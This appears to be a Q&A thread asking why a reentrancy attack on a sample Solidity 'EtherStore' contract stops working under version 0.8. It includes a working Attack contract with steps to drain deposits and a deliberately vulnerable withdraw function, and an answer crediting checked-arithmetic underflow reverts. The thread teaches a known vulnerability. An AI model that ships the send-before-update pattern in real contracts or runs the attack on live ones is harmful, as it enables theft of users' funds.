# Reentrancy hack in Solidity no longer working on pragma ^0.8.0

Tags: ethereum, solidity, smartcontracts

The following contract "EtherStore" contains a vulnerability when attacked by contract "Attack". However, it appears that the same code (for both contracts) compiled in a higher version of solidity (e.g ^0.8.0) no longer allows the hack to be executed.

I've already been through the solidity docs looking for release changes on version [^0.8.0](https://docs.soliditylang.org/en/latest/080-breaking-changes.html) but I wasn't able to find a clear explanation of why this is no longer possible.

You can try this code on [Remix.org.](https://remix.ethereum.org/)

I'd appreciate any answer that would explain why this is happening.

Go to this [video](https://www.youtube.com/watch?v=4Mm3BCyHtDY) for a walkthrough of the code.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.7.6;
// pragma solidity ^0.8.0 or even pragma solidity >=0.4.0 <0.9.0;   <<< no longer works

/*
EtherStore is a contract where you can deposit any amount and withdraw at most
1 Ether per week. This contract is vulnerable to re-entrancy attack.
Let's see why.

1. Deploy EtherStore
2. Deposit 1 Ether each from Account 1 (Alice) and Account 2 (Bob) into EtherStore
3. Deploy Attack with address of EtherStore
4. Call Attack.attack sending 1 ether (using Account 3 (Eve)).
   You will get 3 Ethers back (2 Ether stolen from Alice and Bob,
   plus 1 Ether sent from this contract).

What happened?
Attack was able to call EtherStore.withdraw multiple times before
EtherStore.withdraw finished executing.

Here is how the functions were called
- Attack.attack
- EtherStore.deposit
- EtherStore.withdraw
- Attack fallback (receives 1 Ether)
- EtherStore.withdraw
- Attack.fallback (receives 1 Ether)
- EtherStore.withdraw
- Attack fallback (receives 1 Ether)
*/

contract EtherStore {
    // Withdrawal limit = 1 ether / week
    uint constant public WITHDRAWAL_LIMIT = 1 ether;
    mapping(address => uint) public lastWithdrawTime;
    mapping(address => uint) public balances;

    function deposit() public payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw(uint _amount) public {
        require(balances[msg.sender] >= _amount);
        require(_amount <= WITHDRAWAL_LIMIT);
        require(block.timestamp >= lastWithdrawTime[msg.sender] + 1 weeks);

        (bool sent, ) = msg.sender.call{value: _amount}("");
        require(sent, "Failed to send Ether");

        balances[msg.sender] -= _amount;
        lastWithdrawTime[msg.sender] = block.timestamp;
    }

    // Helper function to check the balance of this contract
    function getBalance() public view returns (uint) {
        return address(this).balance;
    }
}

contract Attack {
    EtherStore public etherStore;

    constructor(address _etherStoreAddress) {
        etherStore = EtherStore(_etherStoreAddress);
    }

    // Fallback is called when EtherStore sends Ether to this contract.
    fallback() external payable {
        if (address(etherStore).balance >= 1 ether) {
            etherStore.withdraw(1 ether);
        }
    }

    function attack() external payable {
        require(msg.value >= 1 ether);
        etherStore.deposit{value: 1 ether}();
        etherStore.withdraw(1 ether);
    }

    // Helper function to check the balance of this contract
    function getBalance() public view returns (uint) {
        return address(this).balance;
    }
}
```

Answer (score 2):

The reason the attack is failing is mentioned in the changelog that you linked :).

> Arithmetic operations revert on underflow and overflow.

When the Attack contract has stolen all funds from the vulnerable contract, i.e. when the if condition in the `fallback` is false, then the balance of the attacker is updated:

```solidity
balances[msg.sender] -= _amount;
```

The thing is that this line is executed multiple times because `withdraw` and `fallback` called each multiple times. If the attacker deposited 1 ether at the beginning, this line will revert the transaction at the second call because of the underflow (1 − 1 − 1 = 2<sup>256</sup> − 1 as we working with `uint256`).

So thanks to this language update, the reentrancy attack is not possible anymore (in this case). But of course that's not a reason not to use the checks-effects-interactions pattern :).

You can modify the code in the following way to observe that the balance of the attacker indeed underflows:

```solidity
event Log(uint256 value);

…

unchecked {
    balances[msg.sender] -= _amount;
    emit Log(balances[msg.sender]);
}
```